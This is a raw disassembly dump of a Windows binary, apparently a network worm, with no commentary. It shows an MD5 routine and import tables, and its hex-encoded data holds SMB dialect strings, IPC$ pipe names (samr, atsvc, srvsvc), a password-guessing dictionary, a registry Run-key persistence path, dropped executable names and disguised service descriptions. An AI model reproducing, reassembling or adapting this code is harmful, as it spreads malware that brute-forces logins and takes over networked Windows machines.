mov eax, edx
add edi, ebx
xor eax, ebx
and eax, edi
mov ebp, [ecx+38h]
xor eax, edx
add esi, ebp
add eax, 0A679438Eh
add esi, eax
rol esi, 11h
mov eax, edi
add esi, edi
xor eax, ebx
and eax, esi
mov ebp, [ecx+3Ch]
xor eax, ebx
loc_414608: ; DATA XREF: sub_404500+24�o
; sub_404500+5D�o
add edx, ebp
loc_41460A: ; DATA XREF: sub_404500+1C�o
add eax, 49B40821h
add edx, eax
loc_414611: ; DATA XREF: sub_4041A0+4B�o
; sub_4049A0+64�o ...
rol edx, 16h
mov eax, esi
add edx, esi
mov ebp, [ecx+4]
xor eax, edx
and eax, edi
xor eax, esi
add ebx, ebp
add eax, 0F61E2562h
add ebx, eax
mov eax, edx
rol ebx, 5
mov ebp, [ecx+18h]
add ebx, edx
xor eax, ebx
and eax, esi
xor eax, edx
add edi, ebp
loc_41463C: ; DATA XREF: sub_4049A0+C9�o
add eax, 0C040B340h
add edi, eax
mov ebp, [ecx+2Ch]
loc_414646: ; DATA XREF: rdata:00403A7C�o
; rdata:00403ADF�o
rol edi, 9
add edi, ebx
mov eax, edi
xor eax, ebx
and eax, edx
xor eax, ebx
add esi, ebp
add eax, 265E5A51h
add esi, eax
mov eax, edi
rol esi, 0Eh
mov ebp, [ecx]
add esi, edi
xor eax, esi
and eax, ebx
xor eax, edi
add edx, ebp
add eax, 0E9B6C7AAh
add edx, eax
mov eax, esi
rol edx, 14h
mov ebp, [ecx+14h]
loc_41467C: ; DATA XREF: rdata:00403A64�o
add edx, esi
xor eax, edx
and eax, edi
xor eax, esi
add ebx, ebp
loc_414686: ; DATA XREF: rdata:004035A6�o
add eax, 0D62F105Dh
add ebx, eax
mov eax, edx
rol ebx, 5
mov ebp, [ecx+28h]
add ebx, edx
xor eax, ebx
and eax, esi
xor eax, edx
add edi, ebp
add eax, 2441453h
add edi, eax
rol edi, 9
add edi, ebx
mov ebp, [ecx+3Ch]
mov eax, edi
xor eax, ebx
and eax, edx
xor eax, ebx
add esi, ebp
loc_4146B8: ; DATA XREF: rdata:004035F3�o
; rdata:0040363B�o ...
add eax, 0D8A1E681h
add esi, eax
loc_4146BF: ; DATA XREF: rdata:00403651�o
mov eax, edi
rol esi, 0Eh
mov ebp, [ecx+10h]
add esi, edi
xor eax, esi
and eax, ebx
xor eax, edi
add edx, ebp
add eax, 0E7D3FBC8h
add edx, eax
mov eax, esi
rol edx, 14h
mov ebp, [ecx+24h]
add edx, esi
xor eax, edx
and eax, edi
xor eax, esi
add ebx, ebp
loc_4146EA: ; DATA XREF: rdata:004035EE�o
add eax, 21E1CDE6h
add ebx, eax
mov eax, edx
rol ebx, 5
mov ebp, [ecx+38h]
add ebx, edx
xor eax, ebx
and eax, esi
xor eax, edx
add edi, ebp
add eax, 0C33707D6h
add edi, eax
mov ebp, [ecx+0Ch]
loc_41470D: ; DATA XREF: sub_409ED0+B2�o
rol edi, 9
add edi, ebx
mov eax, edi
loc_414714: ; DATA XREF: sub_409ED0+A1�o
xor eax, ebx
and eax, edx
xor eax, ebx
add esi, ebp
add eax, 0F4D50D87h
add esi, eax
mov eax, edi
rol esi, 0Eh
mov ebp, [ecx+20h]
add esi, edi
xor eax, esi
and eax, ebx
xor eax, edi
add edx, ebp
add eax, 455A14EDh
add edx, eax
rol edx, 14h
add edx, esi
mov eax, esi
mov ebp, [ecx+34h]
xor eax, edx
and eax, edi
xor eax, esi
add ebx, ebp
add eax, 0A9E3E905h
add ebx, eax
mov eax, edx
rol ebx, 5
mov ebp, [ecx+8]
add ebx, edx
xor eax, ebx
and eax, esi
xor eax, edx
add edi, ebp
add eax, 0FCEFA3F8h
loc_41476C: ; DATA XREF: sub_403B20+12�o
; sub_403B90+9�o
add edi, eax
mov ebp, [ecx+1Ch]
rol edi, 9
add edi, ebx
mov eax, edi
loc_414778: ; DATA XREF: sub_4099E5+13�o
xor eax, ebx
and eax, edx
xor eax, ebx
add esi, ebp
loc_414780: ; DATA XREF: sub_403D90+79�o
; rdata:0040FCF9�o
add eax, 676F02D9h
add esi, eax
mov eax, edi
rol esi, 0Eh
add esi, edi
xor eax, esi
; ---------------------------------------------------------------------------
db 8Bh
dword_414791 dd 33EB23E8h ; rdata:0040FCAC�r ...
byte_414795 db 0EFh, 8Bh, 41h ; DATA XREF: sub_403FF0+C�o
dd 5D50330h, 8D2A4C8Ah, 0C2C1D003h
dword_4147A4 dd 3C78B14h db 0D6h, 33h, 0C6h
byte_4147AB db 8Bh ; DATA XREF: rdata:loc_403674�o
dd 0C2331469h, 4205DD03h, 3FFFA39h, 4C3C1D8h
dword_4147BC dd 0DA03C68Bh, 698BC233h, 3C33320h, 0F68105FDh, 0F8038771h
; DATA XREF: sub_403B90+15�o
db 0C1h, 0C7h
word_4147D2 dw 8B0Bh ; DATA XREF: sub_403B90+2D�o
dd 0F5032C69h, 0C78BFB03h, 6122C681h, 0C2336D9Dh, 0F003C333h
dword_4147E8 dd 8B10C6C1h, 33F703C7h, 38698BC6h, 0EB8BD503h db 33h
byte_4147F9 db 0E8h, 81h, 0C2h ; DATA XREF: sub_4041A0+90�o
dd 0FDE5380Ch
db 3, 0D5h
word_414802 dw 0C2C1h ; DATA XREF: rdata:00404317�o
dd 4698B17h
db 3
byte_414809 db 0DDh, 3, 0D6h ; DATA XREF: rdata:00404361�o
dd 0C381EA8Bh, 0A4BEEA44h, 0DD03E833h
db 0C1h, 0C3h, 4
byte_41481B db 8Bh ; DATA XREF: rdata:004043BF�o
dd 33DA03C6h, 10698BC2h, 0FD03C333h, 0DECFA905h, 0C1F8034Bh
dd 698B0BC7h, 3F5031Ch, 81C78BFBh, 0BB4B60C6h, 33C233F6h
dd 0C1F003C3h, 0C78B10C6h, 698BF703h, 8BD50328h, 81C633EBh
dd 0BFBC70C2h, 3E833BEh, 17C2C1D5h, 334698Bh, 8BD603DDh
dd 0C6C381EAh, 33289B7Eh, 0C1DD03E8h, 0C68B04C3h, 0C233DA03h
dd 0C333298Bh, 0FA05FD03h, 3EAA127h, 0BC7C1F8h, 30C698Bh
db 0F5h, 3, 0FBh
byte_414897 db 8Bh ; DATA XREF: rdata:00404B5F�o
dd 85C681C7h, 33D4EF30h, 3C333C2h
db 0F0h, 0C1h
word_4148A6 dw 10C6h ; DATA XREF: rdata:00404B7E�o
dd 0F703C78Bh, 318698Bh, 33EB8BD5h
dword_4148B4 dd 5C281C6h dword_4148B8 dd 3304881Dh ; sub_403B20+5B�w
dd 0C1D503E8h, 0D60317C2h, 0E833EA8Bh, 324418Bh, 0D03905DDh
dd 0D803D9D4h, 8B04C3C1h, 33DA03C6h, 30698BC2h, 0E505C333h
dd 3E6DB99h, 0C1F803FDh, 698B0BC7h, 3FB033Ch, 81C78BF5h
dd 0A27CF8C6h, 33C2331Fh, 0C1F003C3h, 0C78B10C6h, 698BF703h
dd 3C63308h, 81C333D5h, 0AC5665C2h, 0C1D003C4h, 0C78B17C2h
dd 3FFF083h, 0B298BD6h, 3C633C2h, 224405DDh, 0D803F429h
dd 8B06C3C1h, 0FFF083C6h, 698BDA03h, 33C30B1Ch, 5FD03C2h
dd 432AFF97h, 0C7C1F803h, 83C28B0Ah, 0FB03FFF0h, 0B38698Bh
dd 3C333C7h, 23A705F5h, 0F003AB94h, 8B0FC6C1h, 0FFF083C3h
dd 698BF703h, 33C60B14h, 81D503C7h, 93A039C2h, 0C1D003FCh
dd 0C78B15C2h, 3FFF083h, 30698BD6h, 0C633C20Bh
db 3, 0DDh, 5
dword_414997 dd 655B59C3h ; sub_403B20+24�o
dword_41499B dd 0C3C1D803h ; rdata:00403626�r ...
dword_41499F dd 83C68B06h ; rdata:00403751�r
dword_4149A3 dd 0DA03FFF0h ; rdata:004036FA�r
dword_4149A7 dd 0B0C698Bh dword_4149AB dd 3C233C3h ; rdata:0040360E�r ...
dword_4149AF dd 0CC9205FDh db 0Ch
db 8Fh, 3, 0F8h
dword_4149B7 dd 8B0AC7C1h dword_4149BB dd 0FFF083C2h dword_4149BF dd 698BFB03h db 28h
db 0Bh, 0C7h, 33h
byte_4149C7 db 0C3h ; DATA XREF: sub_403B20+1E�o
dd 7D05F503h, 3FFEFF4h, 0FC6C1F0h, 0F083C38Bh, 8BF703FFh
dd 0C60B0469h, 0D503C733h, 845DD105h, 0C1D00385h, 0C78B15C2h
dd 3FFF083h
db 0D6h, 8Bh, 69h
byte_4149F7 db 20h ; DATA XREF: sub_404CC5+10�o
; sub_4099E5+75�o
dd 0C633C20Bh, 4F05DD03h, 36FA87Eh, 6C3C1D8h
db 8Bh
byte_414A09 db 0C6h, 83h, 0F0h ; DATA XREF: rdata:0040508C�o
dd 8BDA03FFh, 0C30B3C69h, 0FD03C233h, 2CE6E005h, 0C1F803FEh
dd 0C28B0AC7h, 3FFF083h, 18698BFBh, 0C333C70Bh, 1405F503h
dd 3A30143h, 0FC6C1F0h, 0F083C38Bh, 8BF703FFh, 0C60B3469h
dd 0D503C733h, 811A105h, 0C1D0034Eh, 0C78B15C2h, 3FFF083h
dd 10698BD6h, 0C633C20Bh, 8205DD03h, 3F7537Eh, 6C3C1D8h
dd 0F083C68Bh, 8BDA03FFh, 0C30B2C69h, 0FD03C233h, 3AF23505h
dd 0C1F803BDh, 0C28B0AC7h, 3FFF083h
db 0FBh, 8Bh
word_414A92 dw 869h ; DATA XREF: sub_4056D0+3C�o
dd 0C333C70Bh, 0BB05F503h, 32AD7D2h, 0FC6C1F0h, 0F083C38Bh
dd 8BF703FFh, 0C60B2469h, 0D503C733h
dword_414AB4 dd 86D39105h, 0C1D003EBh, 448B15C2h, 0D6031424h, 0D903088Bh
; DATA XREF: sub_408DC0+52F�o
dd 304488Bh, 8B1889D1h, 50890848h, 5DF10304h, 890C488Bh
dd 0F9030870h, 5F0C7889h, 8C25B5Eh, 24A48D00h, 45h dup(0)
dd 138C2h, 0
dd 13BB6h, 13BC8h, 139C2h, 139D0h, 1399Ah, 13982h, 139E0h
dd 139F2h, 13A02h, 13A10h, 13A20h, 13A32h, 13A42h, 13A54h
dd 139ACh, 0
dd 138D8h, 0
dd 135C6h, 135DCh, 135ECh, 135B2h, 135FAh, 1360Ah, 13624h
dd 1363Ah, 1364Eh, 13660h, 13676h, 13686h, 13696h, 136B2h
dd 136CAh, 136E2h, 136F2h, 1370Ah, 1371Ah, 13728h, 1358Eh
dd 13764h, 1356Ch, 135A0h, 13774h, 13784h, 13790h, 137A6h
dd 137B8h, 137CCh, 137D4h, 137E4h, 137F8h, 1380Ah, 1381Ah
dd 13828h, 1383Eh, 13854h, 13860h, 1357Eh, 13878h, 13884h
dd 13890h, 1389Ch, 138A8h, 134ACh, 1349Eh, 13560h, 13552h
dd 13544h, 1352Ch, 1351Eh, 1350Eh, 134FCh, 134ECh, 134D6h
dd 134C8h, 134B8h, 13758h, 13734h, 13744h, 1386Ch, 13B82h
dd 13B92h, 13B6Ch, 0
dd 13946h, 13934h, 1390Ch, 138FCh, 13BA8h, 1391Ch, 0
dd 13960h, 0
dd 13B3Eh, 0
dd 13B5Eh, 13484h, 13478h, 0
dd 13AF4h, 13AFCh, 13AE6h, 13ACEh, 13B06h, 13AC6h, 13B28h
dd 13ABEh, 13AAEh, 13AA4h, 13A96h, 13A88h, 13A76h, 13B0Eh
dd 13B1Ch, 13ADAh, 0
dd 13424h, 2 dup(0)
dd 13492h, 13184h, 132F0h, 2 dup(0)
dd 138B4h, 13050h, 132A0h, 2 dup(0)
dd 138CCh, 13000h, 132E8h, 2 dup(0)
dd 138EEh, 13048h, 133F8h, 2 dup(0)
dd 13956h, 13158h, 13414h, 2 dup(0)
dd 13976h, 13174h, 132A8h, 2 dup(0)
dd 13A68h, 13008h, 13434h, 2 dup(0)
dd 13B32h, 13194h, 1341Ch, 2 dup(0)
dd 13B52h, 1317Ch, 5 dup(0)
dd 138C2h, 0
dd 13BB6h, 13BC8h, 139C2h, 139D0h, 1399Ah, 13982h, 139E0h
dd 139F2h, 13A02h, 13A10h, 13A20h, 13A32h, 13A42h, 13A54h
dd 139ACh, 0
dd 138D8h, 0
dd 135C6h, 135DCh, 135ECh, 135B2h, 135FAh, 1360Ah, 13624h
dd 1363Ah, 1364Eh, 13660h, 13676h, 13686h, 13696h, 136B2h
dd 136CAh, 136E2h, 136F2h, 1370Ah, 1371Ah, 13728h, 1358Eh
dd 13764h, 1356Ch, 135A0h, 13774h, 13784h, 13790h, 137A6h
dd 137B8h, 137CCh, 137D4h, 137E4h, 137F8h, 1380Ah, 1381Ah
dd 13828h, 1383Eh, 13854h, 13860h, 1357Eh, 13878h, 13884h
dd 13890h, 1389Ch, 138A8h, 134ACh, 1349Eh, 13560h, 13552h
dd 13544h, 1352Ch, 1351Eh, 1350Eh, 134FCh, 134ECh, 134D6h
dd 134C8h, 134B8h, 13758h, 13734h, 13744h, 1386Ch, 13B82h
dd 13B92h, 13B6Ch, 0
dd 13946h, 13934h
rdata ends
; Section 3. (virtual address 00015000)
; Virtual size : 00011600 ( 71168.)
; Section size in file : 00011600 ( 71168.)
; Offset to raw data for section: 00015000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_data segment para public 'CODE' use32
assume cs:_data
;org 415000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_415000 dd 1390Ch, 138FCh, 13BA8h, 1391Ch, 0 dd 13960h, 0
dd 13B3Eh, 0
dd 13B5Eh, 13484h, 13478h, 0
dd 13AF4h, 13AFCh, 13AE6h, 13ACEh, 13B06h, 13AC6h, 13B28h
dd 13ABEh, 13AAEh, 13AA4h, 13A96h, 13A88h, 13A76h, 13B0Eh
dd 13B1Ch, 13ADAh, 0
dd 73770262h, 6E697270h, 416674h, 6843001Eh, 6F4C7261h
dd 41726577h, 73750000h, 32337265h, 6C6C642Eh, 1A0000h
dd 736F6C43h, 6E614865h, 656C64h, 6F430024h, 69467970h
dd 41656Ch, 7243002Dh, 65746165h, 6E657645h, 4174h, 72430030h
dd 65746165h, 656C6946h, 310041h
aCreatefilemapp db 'CreateFileMappingA',0
align 4
db ';',0
dw 7243h
db 65h, 61h, 74h
aEmutexa db 'eMutexA',0 ; DATA XREF: sub_408DC0+558�o
align 4
a@ db '@',0
aCreateprocessa db 'CreateProcessA',0
align 2
aF db 'F',0
aCreatethread db 'CreateThread',0
align 2
aS db 'S',0
aDeletefilea db 'DeleteFileA',0
aC db 'c',0
aEntercriticals db 'EnterCriticalSection',0
align 4
aA_0 db '€',0
aExitprocess db 'ExitProcess',0
aB db '',0
aExitthread db 'ExitThread',0
align 10h
aP db '',0
aFindclose db 'FindClose',0
aU db '“',0
aFindfirstfilea db 'FindFirstFileA',0
align 2
db 'œ',0
aFindnextfilea db 'FindNextFileA',0
db '«',0
aFlushviewoffil db 'FlushViewOfFile',0
db 'É',0
aGetcommandline db 'GetCommandLineW',0
db 'Û',0
aGetcurrentproc db 'GetCurrentProcess',0
db 'Ü',0
aGetcurrentpr_0 db 'GetCurrentProcessId',0
aS_0 db 'è',0
aGetdrivetypea db 'GetDriveTypeA',0
dd 654700F5h, 6C694674h, 7A695365h, 0FD0065h, 4C746547h
dd 45747361h, 726F7272h, 1010000h
aGetlogicaldriv db 'GetLogicalDriveStringsA',0
db 7
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
dw 109h
aGetmodulehandl db 'GetModuleHandleA',0
align 2
dw 11Fh
aGetprocaddress db 'GetProcAddress',0
align 10h
db 3Ch ; <
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 152h
aGettickcount db 'GetTickCount',0
align 2
dw 15Ah
aGetversionexa db 'GetVersionExA',0
dw 18Bh
aInitializecrit db 'InitializeCriticalSection',0
dw 18Eh
aInterlockeddec db 'InterlockedDecrement',0
align 2
dw 191h
aInterlockedinc db 'InterlockedIncrement',0
align 2
dw 195h
aIsbadreadptr db 'IsBadReadPtr',0
align 2
dw 1A3h
aLeavecriticals db 'LeaveCriticalSection',0
align 2
dw 1A4h
aLoadlibrarya db 'LoadLibraryA',0
align 2
dw 1AAh
aLocalalloc db 'LocalAlloc',0
align 4
db 0AEh ; ®
db 1, 4Ch, 6Fh
aCalfree db 'calFree',0
db 0BAh ; º
db 1, 4Dh, 61h
aPviewoffile db 'pViewOfFile',0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 1, 4Fh, 70h
aEnfilemappinga db 'enFileMappingA',0
align 4
db 0F7h ; ÷
db 1, 52h, 65h
aAdfile db 'adFile',0
align 4
db 7
db 2, 52h, 65h
aSumethread db 'sumeThread',0
align 4
db 30h ; 0
db 2, 53h, 65h
aTerrormode db 'tErrorMode',0
align 4
db 31h ; 1
db 2, 53h, 65h
aTevent db 'tEvent',0
align 10h
db 34h ; 4
db 2, 53h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 236h
aSetfilepointer db 'SetFilePointer',0
align 4
db 53h ; S
db 2, 53h, 65h
aTthreadpriorit db 'tThreadPriority',0
db 60h ; `
db 2, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 62h ; b
db 2, 53h, 75h
aSpendthread db 'spendThread',0
db 68h ; h
db 2, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 4
db 77h ; w
db 2, 55h, 6Eh
aMapviewoffile db 'mapViewOfFile',0
dw 281h
aVirtualalloc db 'VirtualAlloc',0
align 2
dw 283h
aVirtualfree db 'VirtualFree',0
db 8Fh ;
db 2, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
dw 293h
aWidechartomult db 'WideCharToMultiByte',0
db 9Eh ; ž
db 2, 57h, 72h
aItefile db 'iteFile',0
db 0B5h ; µ
db 2, 6Ch, 73h
aTrcata db 'trcatA',0
align 4
db 0B7h ; ·
db 2, 6Ch, 73h
aTrcmpa db 'trcmpA',0
align 4
db 0B9h ; ¹
db 2, 6Ch, 73h
aTrcmpia db 'trcmpiA',0
db 0BBh ; »
db 2, 6Ch, 73h
aTrcpya db 'trcpyA',0
align 10h
db 0BDh ; ½
db 2, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 0BFh ; ¿
db 2, 6Ch, 73h
aTrlena db 'trlenA',0
align 4
db 0C0h ; À
db 2, 6Ch, 73h
aTrlenw db 'trlenW',0
align 4
aKernel32_dll db 'kernel32.dll',0
align 2
dw 2C5h
aStrstr db 'strstr',0
align 4
aMsvcrt_dll db 'MSVCRT.dll',0
align 4
db 2
align 2
aChecksummapped db 'CheckSumMappedFile',0
align 2
aImagehlp_dll db 'imagehlp.dll',0
align 4
db 0Eh
align 2
aCocreateguid db 'CoCreateGuid',0
align 4
a1 db '1',0
aCoinitialize db 'CoInitialize',0
align 4
aC_0 db 'C',0
aCoregisterclas db 'CoRegisterClassObject',0
aT db 'T',0
aCotaskmemalloc db 'CoTaskMemAlloc',0
align 2
aU_0 db 'U',0
aCotaskmemfree db 'CoTaskMemFree',0
aOle32_dll db 'ole32.dll',0
db 2
align 2
aCommandlinetoa db 'CommandLineToArgvW',0
align 2
aShell32_dll db 'shell32.dll',0
db ']',0
aCryptacquireco db 'CryptAcquireContextA',0
align 2
aN db 'n',0
aCryptgenrandom db 'CryptGenRandom',0
align 4
db 'x',0
aCryptreleaseco db 'CryptReleaseContext',0
dw 180h
aRegclosekey db 'RegCloseKey',0
dd 65520183h, 65724367h, 4B657461h, 417965h, 65520189h
dd 6C654467h, 56657465h, 65756C61h, 18D0041h, 45676552h
dd 4B6D756Eh, 78457965h, 1980041h, 4F676552h, 4B6E6570h
dd 417965h, 65520199h, 65704F67h, 79654B6Eh, 417845h, 655201A2h
dd 65755167h, 61567972h, 4165756Ch, 1AD0000h, 53676552h
dd 61567465h, 4165756Ch, 1AE0000h, 53676552h, 61567465h
dd 4565756Ch, 4178h, 655301DBh, 72655374h, 65636976h, 74617453h
dd 7375h, 61766461h, 32336970h, 6C6C642Eh, 1A0000h, 47415357h
dd 614C7465h, 72457473h, 726F72h, 5357003Fh, 61745341h
dd 70757472h, 500000h, 736F6C63h, 636F7365h, 74656Bh, 6F630051h
dd 63656E6Eh, 530074h, 68746567h, 6274736Fh, 6D616E79h
dd 5C0065h, 6E6F7468h, 5D006Ch, 6E6F7468h, 5E0073h, 74656E69h
dd 6464615Fh, 5F0072h, 74656E69h, 6F746E5Fh, 600061h, 74636F69h
dd 636F736Ch, 74656Bh, 65720064h, 7663h, 65730066h, 7463656Ch
dd 670000h, 646E6573h, 690000h, 73746573h, 6F6B636Fh, 7470h
dd 6873006Ah, 6F647475h, 6E77h, 6F73006Bh, 74656B63h
db 2 dup(0), 77h
byte_415733 db 73h ; DATA XREF: sub_408DC0+6FC�o
dd 32335F32h, 6C6C642Eh, 280000h, 68746150h, 646E6946h
dd 656C6946h, 656D614Eh, 68730041h, 7061776Ch, 6C642E69h
dd 2C006Ch, 72616843h, 65707055h, 4172h, 65470108h, 646F4D74h
dd 46656C75h, 4E656C69h, 57656D61h, 23C0000h, 4C746553h
dd 45747361h, 726F7272h, 1C70000h, 746C754Dh, 74794269h
dd 576F5465h, 43656469h, 726168h, 734900ADh, 61757145h
dd 4955476Ch, 1840044h, 43676552h, 74616572h, 79654B65h
dd 417845h, 65520187h, 6C654467h, 4B657465h, 417965h, 3 dup(0)
dd 454B9FFDh, 0
dd 13C30h, 1, 2 dup(4), 13C08h, 13C18h, 13C28h, 18D0h
dd 1890h, 1850h, 1870h, 13C41h, 13C51h, 13C63h, 13C75h
dd 10000h, 30002h, 65686D64h, 6573706Ch, 72657672h, 6578652Eh
dd 6C6C4400h, 556E6143h, 616F6C6Eh, 776F4E64h, 6C6C4400h
dd 43746547h, 7373616Ch, 656A624Fh, 44007463h, 65526C6Ch
dd 74736967h, 65537265h, 72657672h, 6C6C4400h, 65726E55h
dd 74736967h, 65537265h, 72657672h, 5Eh dup(0)
aAdmin db 'Admin',0
aW db 'W',0
dd 50020000h, 454E2043h, 524F5754h, 5250204Bh, 4152474Fh
dd 2E31204Dh, 4C020030h, 414D4E41h, 302E314Eh, 69570200h
dd 776F646Eh, 6F662073h, 6F572072h, 72676B72h, 7370756Fh
dd 312E3320h, 4C020061h, 322E314Dh, 32303058h, 544E0200h
dd 204D4C20h, 32312E30h, 2A5C5C00h, 53424D53h, 45565245h
dd 50495C52h, 5C002443h, 776F7262h, 726573h, 6D61735Ch
dd 655C0072h, 70616D70h, 726570h, 73746E5Ch, 736376h, 7374615Ch
dd 5C006376h, 73767273h, 0C8006376h, 704B324Fh, 1201D316h
dd 0BF475A78h, 388E16Eh, 40000000h, 3D8D9F4Eh, 8F11CEA0h
dd 3E000869h, 11B0530h, 6A000000h, 0C391928h, 9B11D0B1h
dd 4FC000A8h, 0F52ED9h, 0A0000000h, 1, 0C0000000h, 0
dd 460000h, 82000000h, 511FF706h, 730E80Ah, 0E80B746Dh
dd 18BE9CEh, 25000000h, 0A0D73h, 28207325h, 297325h, 73255C5Ch
dd 245300h, 5C3A63h, 5C3A64h, 65686D64h, 6573706Ch, 72657672h
dd 6578652Eh, 5C3A6300h, 706D6574h, 6578652Eh, 20732500h
dd 29732528h, 3A732520h, 25007325h, 25282073h, 4E202973h
dd 536C6C75h, 73737365h, 41417D00h, 3 dup(0)
dd 41418B00h, 2 dup(0)
dd 6D644100h, 73696E69h, 74617274h, 4100726Fh, 6E696D64h
dd 41418B00h, 4144FD00h, 4144F600h, 41430B00h, 4144EC00h
dd 4144E800h, 4144E300h, 4144DD00h, 4144D600h, 4144CE00h
dd 4144C500h, 4144C300h, 4144C000h, 4144BC00h, 4144B700h
dd 4144B100h, 4144AA00h, 4144A200h, 41449900h, 41448F00h
dd 41448800h, 41448100h, 41447800h, 41447200h, 41446B00h
dd 41446600h, 41446200h, 41445C00h, 41445800h, 41445100h
dd 41444A00h, 41444300h, 41443F00h, 41443900h, 41443400h
dd 41442A00h, 41442100h, 41441A00h, 41441500h, 41441100h
dd 41440A00h, 41440100h, 4143FC00h, 4143F300h, 4143ED00h
dd 4143E500h, 4143E000h, 4143DE00h, 4143DB00h, 4143D500h
dd 4143CF00h, 4143C700h, 4143BE00h, 4143B800h, 4143B300h
dd 4143AB00h, 4143A500h, 41439D00h, 41439500h, 41439100h
dd 41438900h, 41438400h, 41437D00h, 41437600h, 41436F00h
dd 41436A00h, 41436300h, 4144EF00h, 41435A00h, 41435200h
dd 41434B00h, 41434400h, 41433D00h, 41433800h, 41433100h
dd 41432B00h, 41432400h, 41431F00h, 41431A00h, 41431400h
dd 41430500h, 4142FD00h, 4142F500h, 4142F100h, 3 dup(0)
dd 5700h, 77777700h, 6E697700h, 73776F64h, 73697600h, 726F7469h
dd 73657400h, 70003274h, 77737361h, 64726Fh, 74736574h
dd 65740031h, 74007473h, 706D65h, 6E6C6574h, 72007465h
dd 72656C75h, 6D657200h, 65746Fh, 6C616572h, 6E617200h
dd 6D6F64h, 72657771h, 70007974h, 696C6275h, 72700063h
dd 74617669h, 6F700065h, 74797569h, 70006572h, 77737361h
dd 61700064h, 6F007373h, 6C636172h, 6F6E0065h, 73736170h
dd 626F6E00h, 79646Fh, 6B63696Eh, 77656E00h, 73736170h
dd 77656E00h, 74656E00h, 6B726F77h, 6E6F6D00h, 726F7469h
dd 6E6F6D00h, 6D007965h, 67616E61h, 6D007265h, 6C6961h
dd 69676F6Ch, 6E69006Eh, 6E726574h, 69007465h, 6174736Eh
dd 68006C6Ch, 6F6C6C65h, 65756700h, 67007473h, 58006Fh
dd 6F6D6564h, 66656400h, 746C7561h, 62656400h, 64006775h
dd 62617461h, 657361h, 77657263h, 6D6F6300h, 65747570h
dd 6F630072h, 65656666h, 6E696200h, 74656200h, 61620061h
dd 70756B63h, 63616200h, 6F6F646Bh, 6E610072h, 6D796E6Fh
dd 73756Fh, 6E6F6E61h, 706C6100h, 61006168h, 61006D64h
dd 73656363h, 62610073h, 33323163h, 73797300h, 6D6574h
dd 737973h, 65707573h, 71730072h, 6873006Ch, 73007469h
dd 6F646168h, 65730077h, 707574h, 75636573h, 79746972h
dd 63657300h, 657275h, 72636573h, 31007465h, 35343332h
dd 39383736h, 33323100h, 37363534h, 32310038h, 36353433h
dd 32310037h, 36353433h, 33323100h, 31003534h, 343332h
dd 333231h, 31003231h, 30303000h, 30303030h, 30300030h
dd 30303030h, 30300030h, 30303030h, 30303000h, 30003030h
dd 2 dup(303030h), 73003030h, 65767265h, 73610072h, 68676664h
dd 6F6F7200h, 72690074h, 63787664h, 6578652Eh, 686A0020h
dd 6A636764h, 67736168h, 39306364h, 67303938h, 6773616Ah
dd 67686A63h, 33363732h, 75363738h, 66336779h, 43006768h
dd 4449534Ch, 73255Ch, 49534C43h, 73255C44h, 636F4C5Ch
dd 65536C61h, 72657672h, 7B003233h, 6C383025h, 30252D58h
dd 252D5834h, 2D583430h, 2 dup(58323025h), 3230252Dh, 5 dup(32302558h)
dd 3C007D58h, 6C6D7468h, 0A0D003Eh, 4A424F3Ch, 20544345h
dd 65707974h, 7061223Dh, 63696C70h, 6F697461h, 2D782F6Eh
dd 6F656C6Fh, 63656A62h, 4C432274h, 49535341h, 43223D44h
dd 4449534Ch, 3830253Ah, 252D586Ch, 2D583430h, 58343025h
dd 3230252Dh, 32302558h, 30252D58h, 5 dup(30255832h), 3E225832h
dd 424F2F3Ch, 5443454Ah, 0A0D3Eh, 255C7325h, 2E2A0073h
dd 7771002Ah, 73747265h, 74726568h, 6B6A6873h, 63787A6Ch
dd 6A6E6276h, 6E626C6Bh, 7A6C6B6Ah, 62766378h, 787A6D6Eh
dd 6E627663h, 7325006Dh, 652E7325h, 53006578h, 5754464Fh
dd 5C455241h, 7263694Dh, 666F736Fh, 69575C74h, 776F646Eh
dd 75435C73h, 6E657272h, 72655674h, 6E6F6973h, 6E75525Ch
dd 76726553h, 73656369h, 732F2000h, 69767265h, 22006563h
dd 20227325h, 7265732Fh, 65636976h, 67655200h, 65747369h
dd 72655372h, 65636976h, 636F7250h, 737365h, 6E72656Bh
dd 32336C65h, 6C6C642Eh, 44534D00h, 6B7369h, 7774654Eh
dd 206B726Fh, 76726573h, 20656369h, 20726F66h, 6B736964h
dd 6E616D20h, 6D656761h, 20746E65h, 75716572h, 73747365h
dd 74654E00h, 6B726F77h, 6C656820h, 20726570h, 76726553h
dd 656369h, 7265732Fh, 65636976h, 74732F00h, 747261h, 736E692Fh
dd 6C6C6174h, 76726573h, 656369h, 696E752Fh, 6174736Eh
dd 65736C6Ch, 63697672h, 732F0065h, 706F74h, 0
dd 5, 414704h, 41470Dh, 414714h, 414724h, 414736h, 10000000h
dd 1000000h, 100000h, 10000h, 1000h, 61766461h, 32336970h
dd 6C6C642Eh, 6D652D00h, 64646562h, 676E69h, 72697325h
dd 63787664h, 6578652Eh, 0
dd 6F6C4700h, 5C6C6162h, 504B4331h, 505055h, 63746170h
dd 53003A68h, 62654465h, 72506775h, 6C697669h, 656765h
dd 756A6441h, 6F547473h, 506E656Bh, 69766972h, 6567656Ch
dd 6F4C0073h, 70756B6Fh, 76697250h, 67656C69h, 6C615665h
dd 416575h, 6E65704Fh, 636F7250h, 54737365h, 6E656B6Fh
dd 25732500h, 6C642E73h, 435C006Ch, 4449534Ch, 5C732500h
dd 72706E49h, 6553636Fh, 72657672h, 3B003233h, 47004148h
dd 51004148h, 5E004148h, 67004148h, 73004148h, 7E004148h
dd 8A004148h, 73004148h, 6C6C6568h, 642E3233h, 6F006C6Ch
dd 3233656Ch, 6C6C642Eh, 656C6F00h, 33747561h, 6C642E32h
dd 6D66006Ch, 642E3032h, 74006C6Ch, 626D7568h, 642E7776h
dd 6D006C6Ch, 6D746873h, 6C642E6Ch, 6873006Ch, 76636F64h
